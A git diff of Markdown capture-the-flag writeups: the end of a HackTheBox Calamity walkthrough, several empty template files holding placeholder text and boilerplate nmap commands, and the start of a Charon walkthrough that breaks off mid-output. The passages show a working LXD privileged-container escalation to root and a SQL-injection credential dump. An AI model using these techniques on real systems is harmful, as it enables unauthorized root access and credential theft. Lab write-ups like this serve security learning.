+ uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
+ xalvas@calamity:~$ which lxc
+ /usr/bin/lxc
+ xalvas@calamity:~$ lxc --help
+ Usage: lxc command [options]
+
+ This is the LXD command line client.
+
+ All of LXD's features can be driven through the various commands below.
+ For help with any of those, simply call them with --help.
+
+ Commands:
+ config Change container or server configuration options
+ copy Copy containers within or in between LXD instances
+ delete Delete containers and snapshots
+ exec Execute commands in containers
+ file Manage files in containers
+ image Manipulate container images
+ info Show container or server information
+ launch Create and start containers from images
+ list List the existing containers
+ move Move containers within or in between LXD instances
+ profile Manage container configuration profiles
+ publish Publish containers as images
+ remote Manage the list of remote LXD servers
+ restart Restart containers
+ restore Restore containers from snapshots
+ snapshot Create container snapshots
+ start Start containers
+ stop Stop containers
+ version Print the version number of this client tool
+
+ Options:
+ --all Print less common commands
+ --debug Print debug information
+ --verbose Print verbose information
+ --version Show client version
+
+ Environment:
+ LXD_CONF Path to an alternate client configuration directory
+ LXD_DIR Path to an alternate server directory
+
+
+
+The idea here is to import an Alpine Linux machine onto calamity, and to basically use lxc's image import feature to get a root shell onto the host machine:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
+ → sudo apt update -y
+ Hit:1 http://packages.microsoft.com/repos/vscode stable InRelease
+ Hit:2 http://archive-4.kali.org/kali kali-rolling InRelease
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ All packages are up to date.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
+ → sudo apt install docker.io
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ docker.io is already the newest version (19.03.12+dfsg1-3).
+ The following packages were automatically installed and are no longer required:
+ libmpdec2 libx264-155
+ Use 'sudo apt autoremove' to remove them.
+ 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → ls
+ recov.wav recov.wav.b64 recov.wavv
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → mkdir lxd
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
+ → cd lxd
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
+ → git clone https://github.com/saghul/lxd-alpine-builder.git
+ Cloning into 'lxd-alpine-builder'...
+ remote: Enumerating objects: 27, done.
+ remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
+ Unpacking objects: 100% (27/27), 15.98 KiB | 287.00 KiB/s, done.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
+ → cd lxd-alpine-builder/
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → ls
+ build-alpine LICENSE README.md
+
+
+So here we install docker and git clone the lxd-alpine builder repo from saghul
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → sudo su
+ root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ls
+ build-alpine LICENSE README.md rootfs
+ root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ./build-alpine -a i686
+ Determining the latest release... v3.12
+ Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
+ Downloading alpine-keys-2.2-r0.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ Downloading apk-tools-static-2.10.5-r1.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ Downloading alpine-mirrors-3.5.10-r0.apk
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
+ alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
+ Verified OK
+ Selecting mirror http://nl.alpinelinux.org/alpine/v3.12/main
+ fetch http://nl.alpinelinux.org/alpine/v3.12/main/x86/APKINDEX.tar.gz
+ (1/19) Installing musl (1.1.24-r9)
+ (2/19) Installing busybox (1.31.1-r19)
+ Executing busybox-1.31.1-r19.post-install
+ (3/19) Installing alpine-baselayout (3.2.0-r7)
+ Executing alpine-baselayout-3.2.0-r7.pre-install
+ Executing alpine-baselayout-3.2.0-r7.post-install
+ (4/19) Installing openrc (0.42.1-r10)
+ Executing openrc-0.42.1-r10.post-install
+ (5/19) Installing alpine-conf (3.9.0-r1)
+ (6/19) Installing libcrypto1.1 (1.1.1g-r0)
+ (7/19) Installing libssl1.1 (1.1.1g-r0)
+ (8/19) Installing ca-certificates-bundle (20191127-r4)
+ (9/19) Installing libtls-standalone (2.9.1-r1)
+ (10/19) Installing ssl_client (1.31.1-r19)
+ (11/19) Installing zlib (1.2.11-r3)
+ (12/19) Installing apk-tools (2.10.5-r1)
+ (13/19) Installing busybox-suid (1.31.1-r19)
+ (14/19) Installing busybox-initscripts (3.2-r2)
+ Executing busybox-initscripts-3.2-r2.post-install
+ (15/19) Installing scanelf (1.2.6-r0)
+ (16/19) Installing musl-utils (1.1.24-r9)
+ (17/19) Installing libc-utils (0.7.2-r3)
+ (18/19) Installing alpine-keys (2.2-r0)
+ (19/19) Installing alpine-base (3.12.0-r0)
+ Executing busybox-1.31.1-r19.trigger
+ OK: 8 MiB in 19 packages
+
+
+Let it build for a while, then once it's done building, we can use the scp command utility to move the tar.gz file onto the host machine, into xalvas' home directory.
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → scp alpine-v3.12-i686-20200813_2019.tar.gz xalvas@10.10.10.27:
+ xalvas@10.10.10.27's password:
+ alpine-v3.12-i686-20200813_2019.tar.gz 100% 3135KB 535.0KB/s 00:05
+
+ [ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
+ → ssh xalvas@10.10.10.27
+ xalvas@10.10.10.27's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 9 packages can be updated.
+ 8 updates are security updates.
+
+
+ Last login: Thu Aug 13 12:40:34 2020 from 10.10.14.8
+ xalvas@calamity:~$ mkdir lxd
+ xalvas@calamity:~$ mv al
+ alarmclocks/ alpine-v3.12-i686-20200813_2019.tar.gz
+ xalvas@calamity:~$ mv alpine-v3.12-i686-20200813_2019.tar.gz lxd/
+ xalvas@calamity:~$ cd lxd/
+ xalvas@calamity:~/lxd$
+
+
+from here, all we need to do is run the alpine image and init the container:
+
+
+
+ xalvas@calamity:~/lxd$ lxc image import alpine-v3.12-i686-20200813_2019.tar.gz --alias nothing-alpine
+ Generating a client certificate. This may take a minute...
+ If this is your first time using LXD, you should also run: sudo lxd init
+ To start your first container, try: lxc launch ubuntu:16.04
+
+
+ Image imported with fingerprint: 705e08c329b2c8f7d803a5b7b943b828631ab50a5bf05cf8bd62cb4d48c150f9
+ xalvas@calamity:~/lxd$
+ xalvas@calamity:~/lxd$ lxc image list
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ | nothing-alpine | 705e08c329b2 | no | alpine v3.12 (20200813_20:19) | i686 | 3.06MB | Aug 13, 2020 at 6:34pm (UTC) |
+ +----------------+--------------+--------+-------------------------------+------+--------+------------------------------+
+ xalvas@calamity:~/lxd$ lxc init nothing-alpine privesc -c security.privileged=true
+ Creating privesc
+ xalvas@calamity:~/lxd$ lxc list
+ +---------+---------+------+------+------------+-----------+
+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+ +---------+---------+------+------+------------+-----------+
+ | privesc | STOPPED | | | PERSISTENT | 0 |
+ +---------+---------+------+------+------------+-----------+
+
+
+Here we basically init our alpine container with the security.privileged flag set to true. From here we need to add the privesc config to our host-root at /mnt/root and then start the privesc config from our container onto /bin/sh in order to get a root shell From the container, BUT the main host's root (/) directory is accessible from the container's /mnt/root, which means the root flag is accessible from /mnt/root/root/root.txt inside the container itself.
+
+
+
+ xalvas@calamity:~/lxd$ lxc config device add privesc host-root disk source=/ path=/mnt/root
+ Device host-root added to privesc
+ xalvas@calamity:~/lxd$ lxc start privesc
+ xalvas@calamity:~/lxd$ lxc exec privesc /bin/sh
+ ~ # id
+ uid=0(root) gid=0(root)
+ ~ # cat /mnt/root/root/root.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/20.md b/Hard/20.md
new file mode 100644
index 0000000..4dcc7ae
--- /dev/null
+++ b/Hard/20.md
@@ -0,0 +1,66 @@
+# Ellingson Writeup
+
+
+
+## Introduction :
+
+Ellingson is a hard linux box released back in May 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/21.md b/Hard/21.md
new file mode 100644
index 0000000..971e944
--- /dev/null
+++ b/Hard/21.md
@@ -0,0 +1,66 @@
+# Chainsaw Writeup
+
+
+
+## Introduction :
+
+Chainsaw is a hard linux box released back in June 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/22.md b/Hard/22.md
new file mode 100644
index 0000000..ca37f16
--- /dev/null
+++ b/Hard/22.md
@@ -0,0 +1,66 @@
+# Player Writeup
+
+
+
+## Introduction :
+
+Player is a hard linux box released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/23.md b/Hard/23.md
new file mode 100644
index 0000000..f037036
--- /dev/null
+++ b/Hard/23.md
@@ -0,0 +1,66 @@
+# RE Writeup
+
+
+
+## Introduction :
+
+RE is a hard windows box released back in July 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/24.md b/Hard/24.md
new file mode 100644
index 0000000..e0515aa
--- /dev/null
+++ b/Hard/24.md
@@ -0,0 +1,66 @@
+# Scavenger Writeup
+
+
+
+## Introduction :
+
+Scavenger is a hard linux box released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/25.md b/Hard/25.md
new file mode 100644
index 0000000..ffc9130
--- /dev/null
+++ b/Hard/25.md
@@ -0,0 +1,66 @@
+# Zetta Writeup
+
+
+
+## Introduction :
+
+Zetta is a hard linux box released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/26.md b/Hard/26.md
new file mode 100644
index 0000000..4ac1c0c
--- /dev/null
+++ b/Hard/26.md
@@ -0,0 +1,66 @@
+# Registry Writeup
+
+
+
+## Introduction :
+
+Registry is a hard linux box released back in October 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/27.md b/Hard/27.md
new file mode 100644
index 0000000..f504ac5
--- /dev/null
+++ b/Hard/27.md
@@ -0,0 +1,66 @@
+# Control Writeup
+
+
+
+## Introduction :
+
+Control is a hard windows box released back in November 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/28.md b/Hard/28.md
new file mode 100644
index 0000000..7ac627f
--- /dev/null
+++ b/Hard/28.md
@@ -0,0 +1,66 @@
+# Patents Writeup
+
+
+
+## Introduction :
+
+Patents is a hard linux box released back in January 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/29.md b/Hard/29.md
new file mode 100644
index 0000000..774439a
--- /dev/null
+++ b/Hard/29.md
@@ -0,0 +1,66 @@
+# Oouch Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/3.md b/Hard/3.md
new file mode 100644
index 0000000..b67053e
--- /dev/null
+++ b/Hard/3.md
@@ -0,0 +1,501 @@
+# Charon Writeup
+
+
+
+## Introduction :
+
+Charon is a hard linux box released back in july 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.31 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 22/tcp on 10.10.10.31
+ Discovered open port 80/tcp on 10.10.10.31
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → nmap -sCV -p22,80 10.10.10.31
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 18:44 BST
+ Nmap scan report for 10.10.10.31
+ Host is up (0.027s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
+ | 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
+ |_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Frozen Yogurt Shop
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/10 ] [~]
+ → nikto -h http://10.10.10.31/
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.31
+ + Target Hostname: 10.10.10.31
+ + Target Port: 80
+ + Start Time: 2020-08-08 18:46:07 (GMT1)
+ ---------------------------------------------------------------------------
+ + Server: Apache/2.4.18 (Ubuntu)
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + IP address found in the 'location' header. The IP is "127.0.1.1".
+ + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ + Server may leak inodes via ETags, header found with file /, inode: 9f2, size: 552d7084393f2, mtime: gzip
+ + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ + OSVDB-3233: /icons/README: Apache default file found.
+ + 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ + End Time: 2020-08-08 18:51:23 (GMT1) (316 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+` charo
+
+Doesn't look like there's man things here for us to make use of, so let's use gobuster
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
+ → gobuster dir -u http://10.10.10.31/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "txt,php,html,js,xml,pdf"
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.31/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: php,html,js,xml,pdf,txt
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/08 18:50:04 Starting gobuster
+ ===============================================================
+ /about.html (Status: 200)
+ /index.md (Status: 200)
+ /product.html (Status: 200)
+ /contact.html (Status: 200)
+ /images (Status: 301)
+ /blog.html (Status: 200)
+ /css (Status: 301)
+ /js (Status: 301)
+ /include (Status: 301)
+ /fonts (Status: 301)
+ /cmsdata (Status: 301)
+ /server-status (Status: 403)
+ ===============================================================
+ 2020/08/08 19:09:12 Finished
+ ===============================================================
+
+
+
+the idea here was to run gobuster again into the /cmsdata directory in order to find the login.php webpage:
+
+
+
+ [ 10.10.14.11/23 ] [ /dev/pts/11 ] [~]
+ → gobuster dir -u http://10.10.10.31/cmsdata/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.
+ txt -t 50 -x "txt,php,html,js,xml,pdf"
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.31/cmsdata/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,php,html,js,xml,pdf
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/08 19:13:49 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /scripts (Status: 301)
+ /menu.php (Status: 302)
+ /login.php (Status: 200)
+ /upload.php (Status: 302)
+ /css (Status: 301)
+ /js (Status: 301)
+ /include (Status: 301)
+ /forgot.php (Status: 200)
+ Progress: 89237 / 220561 (40.46%)^C
+ [!] Keyboard interrupt detected, terminating.
+ ===============================================================
+ 2020/08/08 19:21:32 Finished
+ ===============================================================
+
+
+
+` 
+
+So here we on /cmsdata/login.php we stumble upon a SuperCMS login php page. There isn't much on the login page itself so we take a look at the "forgot password?" page and inspect the request with burpsuite:
+
+ 
+
+Here we get a generic error that email isn't found, But let's test out and see if we can trigger a SQL injection:
+
+
+
+Here we see something is up, let's poke at it further by using the "-- -" string to comment out the query , which should remove the error, and verify that we are dealing with a SQL injection:
+
+
+
+Now that we know it is a SQL injection, we can test it further:
+
+ 
+
+So now we know the 4th field takes in a string, which is an email,so let's poke around the sql injection further:
+
+
+
+and we found the supercms database! Now let's find the name of the table containing those emails
+
+
+
+So far we know we are in the supercms database, and looking at the table called "license", But with further enumeration we find another table called "operators":
+
+
+
+So now we have the name of the tables, we will enumerate the columns:
+
+  
+
+Now we know the table Operators contains the columns __username_ and __password_
+
+
+
+So now let's just dump the usernames and passwords:
+
+ 
+
+And we found credentials ! **super_cms_adm:0b0689ba94f94533400f4decd87fa260** however the password is hashed, so we use hash-identifier to figure out which format it is :
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
